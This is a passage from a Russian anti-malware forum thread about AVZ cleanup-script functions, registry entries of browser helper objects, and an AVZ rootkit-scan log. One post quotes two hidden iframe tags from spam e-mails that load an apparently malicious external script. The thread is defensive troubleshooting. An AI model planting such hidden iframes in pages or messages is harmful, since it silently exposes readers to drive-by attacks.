-
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-

Сообщение от
surok
Или при чистке реестра функцией ExecuteSysClean удаляется весь CLSID в котором был зарегистрирован этот файл и DelCLSID уже не нужна?
имхо, не надо полностью полагаться на ExecuteSysClean, практика показывает, что для AVZ 4.30 DelCLSID применять надо.
-

Сообщение от
Pili
практика показывает, что для AVZ 4.30 DelCLSID применять надо.
И для AVZ 4.32 тоже...
Сердце решает кого любить... Судьба решает с кем быть...
-
-
AVZ 4.30 DelCLSID применять надо.
С этим согласен.
А вот DelBHO я так и не понял, работает ли вообще?
В логе тыкаешь на это, а бесполезно ))
Всё равно приходится в Хиджаке фиксить.
-
-

Сообщение от
light59
А вот DelBHO я так и не понял, работает ли вообще?
Вообще работает )
DelBHO, как я понял, удаляет только из
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
И не удаляет из
Код:
HKEY_CLASSES_ROOT\CLSID\
Хотя очень часто, то что прописано в ВНО, находится и CLSID, например от MyCenria есть в
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}
и в
Код:
HKEY_CLASSES_ROOT\CLSID\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}
Однако по логам AVZ предлагает только
Код:
DelBHO('{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}');
-
А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?
-
-

Сообщение от
gjf
А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?
Да
Добавлено через 1 минуту

Сообщение от
Pili
Вообще работает )
DelBHO, как я понял, удаляет только из
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
Именно так и есть. DelCLSID идет начиная от CLSID - прибивает его (класс в результате уже не загрузится) и зачищает ссылки на него в основных известных местах. В то время как DelBHO только удаляет BHO и ничего более не делает
Последний раз редактировалось Зайцев Олег; 29.05.2009 в 17:16.
Причина: Добавлено
-
-
Junior Member
- Вес репутации
- 64

Сообщение от
Aleksandra
И для AVZ 4.32 тоже...
А что это за версия такая, можно поинтересоваться??
-
Junior Member
- Вес репутации
- 59

Сообщение от
vistaorxpmoy
А что это за версия такая, можно поинтересоваться??

http://rapidshare.com/files/231459517/special_avz.zip - полиморфный AVZ 4.32 от 05.05.2009.
[URL=http://virusinfo.info/pravila.html]Золотые правила раздела "Помогите".
[/URL][url=http://virusinfo.info/showthread.php?t=4491]Что значит "пофиксить с помощью HijackThis"?[/url]
[url=http://virusinfo.info/showthread.php?t=7239]Как выполнить скрипт в AVZ ?[/url]
-
Junior Member
- Вес репутации
- 68
А основная версия будет обновляться?
Будет ли она полиморфной?
-
Junior Member
- Вес репутации
- 68
Народ, а что, RSS-лента по теме не работает (ссылку нашёл, но тема пустая)?
Нельзя ли попросить админа её включить - а то с подпиской какие-то глюки в последнее время...?
-
Junior Member
- Вес репутации
- 59
Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции!
-
Junior Member
- Вес репутации
- 59

Сообщение от
Multur
Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции!
По какой ссылке скачиваешь архив ?
Программу не нужно устанавливать, после распаковки запускаешь файл "Avz.exe" - всё. Программа работает.
[URL=http://virusinfo.info/pravila.html]Золотые правила раздела "Помогите".
[/URL][url=http://virusinfo.info/showthread.php?t=4491]Что значит "пофиксить с помощью HijackThis"?[/url]
[url=http://virusinfo.info/showthread.php?t=7239]Как выполнить скрипт в AVZ ?[/url]
-
Junior Member
- Вес репутации
- 68
Антивирусный плагин AVZ для The Bat не реагирует на следующую вещь в HTML письмах - ни при получении письма, ни при принудительной проверке папок почтовых ящиков на вирусы (изнутри Бата):
Код:
<iframe qhdik='gvSDpyE9' src='http://javacsript.biz/in/in.cgi?2 ' jstuj='9lPaDk9P' width='57' height='296' style='display:none'></iframe>
или
Код:
<iframe cerob='l5hSVJLW' src='http://javacsript.biz/in/in.cgi?2 ' mbmko='imTSb040' width='0' height='0' style='display:none'></iframe>
Бат версия 4.1.11.2 RC2.
Так и должно быть?
И что с этим делать?
P.S.: Avast письма с этим кодом считает зловредными.
-
Junior Member
- Вес репутации
- 59
[QUOTE=Multur;409637]Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции
Следующий!
-
-
-
Junior Member
- Вес репутации
- 59
Здравствуйте!
Заранее извиняюсь, если не в ту тему.
Подскажите пожалуйста, что это значит, (особено маскировка процессов и драйверов):
Выполняется стандартный скрипт: 1. Поиск и нейтрализации RootKit UserMode и KernelMode
1.1 Поиск перехватчиков API, работающих в UserMode
Анализ kernel32.dll, таблица экспорта найдена в секции .text
Анализ ntdll.dll, таблица экспорта найдена в секции .text
Анализ user32.dll, таблица экспорта найдена в секции .text
Анализ advapi32.dll, таблица экспорта найдена в секции .text
Анализ ws2_32.dll, таблица экспорта найдена в секции .text
Анализ wininet.dll, таблица экспорта найдена в секции .text
Анализ rasapi32.dll, таблица экспорта найдена в секции .text
Анализ urlmon.dll, таблица экспорта найдена в секции .text
Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.2 Поиск перехватчиков API, работающих в KernelMode
Драйвер успешно загружен
SDT найдена (RVA=137B00)
Ядро ntkrnlpa.exe обнаружено в памяти по адресу 81A34000
SDT = 81B6BB00
KiST = 81AEC8E0 (391)
Проверено функций: 391, перехвачено: 0, восстановлено: 0
1.3 Проверка IDT и SYSENTER
Анализ для процессора 1
Анализ для процессора 2
Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
Маскировка процесса с PID=476, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 476)
Маскировка процесса с PID=588, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 58
Маскировка процесса с PID=652, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 652)
Маскировка процесса с PID=1116, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1116)
Маскировка процесса с PID=1764, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1764)
Маскировка процесса с PID=1928, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 192
Маскировка процесса с PID=220, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 220)
Маскировка процесса с PID=348, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 34
Маскировка процесса с PID=1720, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1720)
Маскировка процесса с PID=2052, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2052)
Маскировка процесса с PID=2084, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2084)
Маскировка процесса с PID=2536, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2536)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3740, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3740)
Маскировка процесса с PID=3864, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3864)
Маскировка процесса с PID=3340, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3340)
Маскировка процесса с PID=3356, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3356)
Маскировка процесса с PID=3456, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3456)
Маскировка процесса с PID=3532, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3532)
Маскировка процесса с PID=3716, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3716)
Маскировка процесса с PID=3888, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 388
Маскировка процесса с PID=156, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 156)
Маскировка процесса с PID=3228, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 322
Маскировка процесса с PID=2128, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 212
Маскировка процесса с PID=1404, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1404)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=1296, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1296)
Маскировка процесса с PID=312, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 312)
Маскировка процесса с PID=2856, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2856)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3968, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 396
Маскировка процесса с PID=2180, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2180)
Маскировка процесса с PID=1672, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1672)
Маскировка процесса с PID=3432, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3432)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=2148, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 214
Маскировка процесса с PID=3732, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3732)
Маскировка процесса с PID=3416, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3416)
Поиск маскировки процессов и драйверов завершен
Драйвер успешно загружен
1.5 Проверка обработчиков IRP
Проверка завершена
Спасибо!!!!
-
Сервер или Виста? Для них это вполне нормально. Какие-то короткоживущие процессы, AVZ не успевает получить о них информацию.
-